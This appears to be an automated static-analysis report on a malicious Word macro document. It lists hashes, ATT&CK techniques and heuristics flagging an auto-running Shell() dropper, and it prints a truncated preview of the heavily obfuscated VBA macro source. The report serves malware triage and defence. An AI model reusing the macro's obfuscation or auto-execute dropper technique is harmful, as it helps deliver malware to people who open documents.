Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ac27910855bb6481…

MALICIOUS

Office (OLE)

172.0 KB Created: 2018-02-22 08:35:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: 8d8f98091b39706c1a0008a89c09e4f0 SHA-1: 43c9c685f7ec4c3acbdfe65b47988a36287848ed SHA-256: ac27910855bb648126377452426c84fa7b7f3f0e8045689b1d13260fdf416333
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains a critical OLE_VBA_SHELL heuristic firing, indicating the use of the Shell() function within its VBA macros. This suggests the macro is designed to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection name 'Doc.Dropper.Agent-6459390-0' further supports this dropper functionality. The AutoOpen macro marker indicates it will execute automatically upon opening.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6459390-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6459390-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 54024 bytes
SHA-256: 7c12cfcf0b3afe108b79d6e1149d62c777d23c2e0e7cc1fbbcd591cbe9b7bba4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 27 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "YUDhBCOSoTpYG"
Function zjVJGLPjMEv()
On Error Resume Next
OkOtzPbwP = "IonrRdq% tes&&!%ITUIVJlQQCMlQ"
PtOXcbi = kfvPFzumJJDucu = ADnjVMnN - sjcCGLq * 9146728 + CBool(1407496) - aEljr * Atn(3843032 + ChrB(QYwzRVVBVwOLNk) + ShXWXsjzSInaUN * 2872535)
RUzMOhRk = wPavPQQa = HBkPbkt - dmEMVwCk * 5088304 + CBool(5692714) - ivAnGcSwnphB * Atn(3091357 + ChrB(JQqviqYtJraKIa) + XLoncvSG * 2596690)
VrOBpoATl = (GRDHuwaVV) + hghbjJKfvkKs(OkOtzPbwP, 14, 12)
AwubSjBFMK = "ckrjdnoHkfITJUwdNpes&&s=ajJlAijIrPaCOjaUpo"
MviSI = OXabc = EHwNcqJNcjcQa - jsSVitPdwzviNd * 6604787 + CBool(5601492) - soSlqG * Atn(1803384 + ChrB(YLIFoUoGz) + VEEwjbbJ * 9277673)
iRwSMjqkUOJ = wcjfzbjb = MslJwG - GXJfGYNJMYD * 9103721 + CBool(1011032) - JhKqZvidFMkNz * Atn(7541477 + ChrB(kvGqAVDzRM) + PXSbYoWQDL * 5115483)
VPCHzGXO = (nJnGbvloPMj) + hghbjJKfvkKs(AwubSjBFMK, 19, 6)
fuoYcm = "GipJuh%4rav% teYiTqQiTj"
CMuKjQ = rSTfOMYnmldpGC = ZwtYQ - wWZzJLL * 3230569 + CBool(5705634) - JbcmiwIumdCDho * Atn(1840106 + ChrB(VGEVlw) + mtvujEANXJmTOd * 3185633)
iLHAo = bpzmmIvpl = zqEMIMLjqsiEc - lQfuuVvjFjdfm * 2353000 + CBool(1721902) - wGJqEKIKBa * Atn(1533402 + ChrB(nXoWNJAVdAv) + uTlVjcaz * 4467965)
lzZpNB = (ZKDdSzutY) + hghbjJKfvkKs(fuoYcm, 9, 9)
BnVun = "iKfGkn3rav%!!%8rajtidVmhbjAEFo"
mwSvz = EiipDlYq = jqOLVLwOBVaMf - ZmZXtQmGwiHzs * 9627090 + CBool(3998624) - BLXHiKaojJuGT * Atn(6729593 + ChrB(GZoECiOfZC) + skDVTAtHTP * 7953407)
jOLmvJLr = MPMkqkVjn = CBaDtSP - fzEFRqkLpuMM * 2946083 + CBool(2455935) - BcppuYvE * Atn(4249793 + ChrB(dhCvPHbrjjsSG) + WzfubUazqkYbDc * 4005187)
FQaYrK = (ucvllbHUt) + hghbjJKfvkKs(BnVun, 14, 11)
ctrOdWWRUq = "jJJTwKTPTkRqzFTAjVHizlMl!%6rav%Z"
fFUjIjzNS = iGhisqw = PjCpwwBXkEzJAi - pacDzrEaOszm * 1947752 + CBool(1963557) - rvATP * Atn(8056997 + ChrB(pkIbFukVwLwUsH) + nwFKJowA * 1955077)
rFLivVzk = NhMBIhTwslsuW = JpstmpqRvbIB - EjIsjwk * 8468947 + CBool(2562451) - UqidXzWXt * Atn(5482379 + ChrB(BTwCOUBv) + ktHTOPksIvmu * 9292828)
tJPUMq = (ksiPoIiPZ) + hghbjJKfvkKs(ctrOdWWRUq, 2, 7)
ffLsKE = "bdpziShEmv%!!%7rav%!&&ljCUKkIwUkk"
XOCLVqXCw = NGwAnCEr = bjmajYbiJJ - aTrMzANtk * 2293568 + CBool(4811259) - DiIXzTJvFLTNk * Atn(9259940 + ChrB(OlMMFMbstPkBmo) + HPCmjva * 229516)
TjoXCz = KzOSOzicDD = IYzThblOIPSWGu - EKzMA * 7647536 + CBool(6920520) - BFwIiukHwip * Atn(593613 + ChrB(PiFHKMsMscI) + KvTiqDLYn * 9653882)
jirGQ = (XDIMSSYEP) + hghbjJKfvkKs(ffLsKE, 11, 14)
UKLRt = "NYapSQmaQGAv% tes&&pJ"
VDXZkEs = ZqWSuzfcicFPW = ZMfEVOk - PVZALvEzujHi * 6459596 + CBool(7599207) - qsOuuYtKXMHt * Atn(4645831 + ChrB(uhRGob) + stmkY * 7166863)
rjsXXm = YHsjmXpMGUq = VKCoDBf - zzqXsMozwbKW * 7626532 + CBool(2165652) - PUaHAThazQdF * Atn(8134243 + ChrB(FjiswiZRUnajr) + iJTXKZm * 3833638)
uWuGHScNzcj = (jTHUXHToQ) + hghbjJKfvkKs(UKLRt, 2, 9)
iJCSW = "tjQjfzSVtrdCKUTIPjCtriHudlZ%UbrWsuz"
nbdcPh = FGYMDQ = PbzjQVRD - GEjMztZ * 3136123 + CBool(4075518) - Mhbwi * Atn(412775 + ChrB(UADmz) + mqWMRjvqKi * 250266)
hCCXEmmKhA = aLlJLj = rDEjoc - iPBQAbGb * 8860358 + CBool(4189205) - jIjZKCwarH * Atn(8253063 + ChrB(LpWdIah) + ikAEfp * 8796384)
znjNoC = (ufVSZtGPGzH) + hghbjJKfvkKs(iJCSW, 8, 1)
DXMpLjqTY = "UVPNZWKfLjuwvnmsZQdSMSMsCbvjkTiQuCc=%7rav% owb"
qjYXC = rawRLOUpLXo = UzubiDR - lCGFpC * 5671417 + CBool(8056287) - ZiudY * Atn(1848690 + ChrB(mwoKDEI) + FqtDPpwrqLvpT * 8267592)
IijZCCd = Ikiompuhwo = pkOGFjuQzzJ - aLcqDRcUq * 9093195 + CBool(4323046) - aYPVBLIwPfA * Atn(2448254 + ChrB(kFOuDrcwKE) + JwqQUTttNi * 6191988)
fKvQqHaa = (aAzRPjiYbSsC) + hghbjJKfvkKs(DXMpLjqTY, 4, 8)
FTukrMQRic = "mCjprkvEEcQQaaljTrKtoNqquAzbGXp u"
KzOQvNqiu = EzzIwOKV = SznVCjQf - nMTHbllAnBMdR * 1585627 + CBool(3347784) - oGqKDCCHvtULP * Atn(2236390 + ChrB(plYcavzXOW) + bIJoApWiNaZUrk * 1993858)
jdzzIa = LhQakba = ssjrvricn - btzHtf * 801
... (truncated)